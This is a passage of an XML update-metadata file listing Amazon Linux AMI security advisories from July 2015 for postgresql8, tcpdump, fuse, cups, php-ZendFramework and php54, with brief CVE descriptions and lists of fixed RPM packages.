release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.8.11" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.11-1.49.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.11" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.8.11-1.49.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.11" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.11-1.49.amzn1.i686.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.11" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.8.11-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-556</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-556: medium priority package update for postgresql8</title><issued date="2015-07-07 12:29:00" /><updated date="2015-07-07 22:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3167:
It was discovered that the pgcrypto module could return different error messages when decrypting certain data with an incorrect key. This can help an authenticated user to launch a possible cryptographic attack, although no suitable attack is currently known.
CVE-2015-3166:
It was discovered that PostgreSQL did not properly check the return values of certain standard library functions. If the system is in a state that would cause the standard library functions to fail, for example memory exhaustion, an authenticated user could exploit this flaw to disclose partial memory contents or cause the GSSAPI authentication to use an incorrect keytab file.
CVE-2015-3165:
A double-free flaw was found in the connection handling. An unauthenticated attacker could exploit this flaw to crash the PostgreSQL back end by disconnecting at approximately the same time as the authentication time out is triggered.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3165" title="" id="CVE-2015-3165" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3166" title="" id="CVE-2015-3166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3167" title="" id="CVE-2015-3167" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1194.html" title="" id="RHSA-2015:1194" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-server" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="3.50.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-3.50.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="3.50.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-3.50.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-3.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-557</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-557: medium priority package update for tcpdump</title><issued date="2015-07-07 12:31:00" /><updated date="2015-07-07 22:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2154:
The osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value.
1201797:
CVE-2015-2154 tcpdump: ethernet printer osi_print_cksum() missing sanity checks out-of-bounds read
CVE-2015-0261:
Integer signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value.
1201792:
CVE-2015-0261 tcpdump: IPv6 mobility printer mobility_opt_print() typecasting/signedness error
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0261" title="" id="CVE-2015-0261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2154" title="" id="CVE-2015-2154" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tcpdump-debuginfo" version="4.0.0" release="3.20090921gitdf3cb4.2.10.amzn1" epoch="14" arch="x86_64"><filename>Packages/tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.x86_64.rpm</filename></package><package name="tcpdump" version="4.0.0" release="3.20090921gitdf3cb4.2.10.amzn1" epoch="14" arch="x86_64"><filename>Packages/tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.x86_64.rpm</filename></package><package name="tcpdump" version="4.0.0" release="3.20090921gitdf3cb4.2.10.amzn1" epoch="14" arch="i686"><filename>Packages/tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.i686.rpm</filename></package><package name="tcpdump-debuginfo" version="4.0.0" release="3.20090921gitdf3cb4.2.10.amzn1" epoch="14" arch="i686"><filename>Packages/tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-558</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-558: medium priority package update for fuse</title><issued date="2015-07-07 12:33:00" /><updated date="2015-07-07 22:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3202:
It was discovered that fusermount failed to properly sanitize its environment before executing mount and umount commands. A local user could possibly use this flaw to escalate their privileges on the system.
1224103:
CVE-2015-3202 fuse: incorrect filtering of environment variables leading to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3202" title="" id="CVE-2015-3202" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="fuse-devel" version="2.9.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-devel-2.9.4-1.17.amzn1.x86_64.rpm</filename></package><package name="fuse-debuginfo" version="2.9.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-debuginfo-2.9.4-1.17.amzn1.x86_64.rpm</filename></package><package name="fuse" version="2.9.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-2.9.4-1.17.amzn1.x86_64.rpm</filename></package><package name="fuse-libs" version="2.9.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-libs-2.9.4-1.17.amzn1.x86_64.rpm</filename></package><package name="fuse-debuginfo" version="2.9.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-debuginfo-2.9.4-1.17.amzn1.i686.rpm</filename></package><package name="fuse-devel" version="2.9.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-devel-2.9.4-1.17.amzn1.i686.rpm</filename></package><package name="fuse" version="2.9.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-2.9.4-1.17.amzn1.i686.rpm</filename></package><package name="fuse-libs" version="2.9.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-libs-2.9.4-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-559</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-559: medium priority package update for cups</title><issued date="2015-07-07 12:34:00" /><updated date="2015-07-07 22:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following 
vulnerabilities:
CVE-2015-1159:
A cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.
CVE-2015-1158:
A string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server.
CVE-2014-9679:
An integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially-crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9679" title="" id="CVE-2014-9679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158" title="" id="CVE-2015-1158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1159" title="" id="CVE-2015-1159" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1123.html" title="" id="RHSA-2015:1123" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-debuginfo" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.21.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.21.amzn1" epoch="1" 
arch="i686"><filename>Packages/cups-php-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.21.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.21.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-560</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-560: medium priority package update for php-ZendFramework</title><issued date="2015-07-07 12:35:00" /><updated date="2015-07-07 22:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3154:
1215712:
CVE-2015-3154 php-ZendFramework2: ZF2015-04: Potential header and mail injection vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3154" title="" id="CVE-2015-3154" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-extras" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package 
name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.13" release="1.11.amzn1" epoch="0" 
arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.13-1.11.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.13" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.13-1.11.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-561</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-561: medium priority package update for php54</title><issued date="2015-07-07 12:39:00" /><updated date="2015-07-07 22:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4644:
1234940:
CVE-2015-4644 php: segmentation fault in php_pgsql_meta_data()
CVE-2015-4643:
1234938:
CVE-2015-4643 php: integer overflow in ftp_genlist() resulting in heap overflow (improved fix for CVE-2015-4022)
CVE-2015-4642:
CVE-2015-3415:
The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, which allows context-dependent attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via a crafted CHECK clause, as demonstrated by CHECK(0&amp;O&gt;O) in a CREATE TABLE statement.
1212356:
CVE-2015-3415 sqlite: invalid free() in src/vdbe.c
CVE-2015-3414:
SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, which allows context-dependent attackers to cause a denial of service (uninitialized memory access and application crash) or possibly have unspecified other impact via a crafted COLLATE clause, as demonstrated by COLLATE"""""""" at the end of a SELECT statement.
1212353:
CVE-2015-3414 sqlite: use of uninitialized memory when parsing collation sequences in src/where.c
CVE-2014-3416:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3416" title="" id="CVE-2014-3416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414" title="" id="CVE-2015-3414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415" title="" id="CVE-2015-3415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4642" title="" id="CVE-2015-4642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4643" title="" id="CVE-2015-4643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4644" title="" id="CVE-2015-4644" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-tidy" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.42" release="1.71.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-mbstring-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-intl" 
version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.42" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.42" release="1.71.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-soap-5.4.42-1.71.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.42" release="1.71.amzn1" epoch="0" 
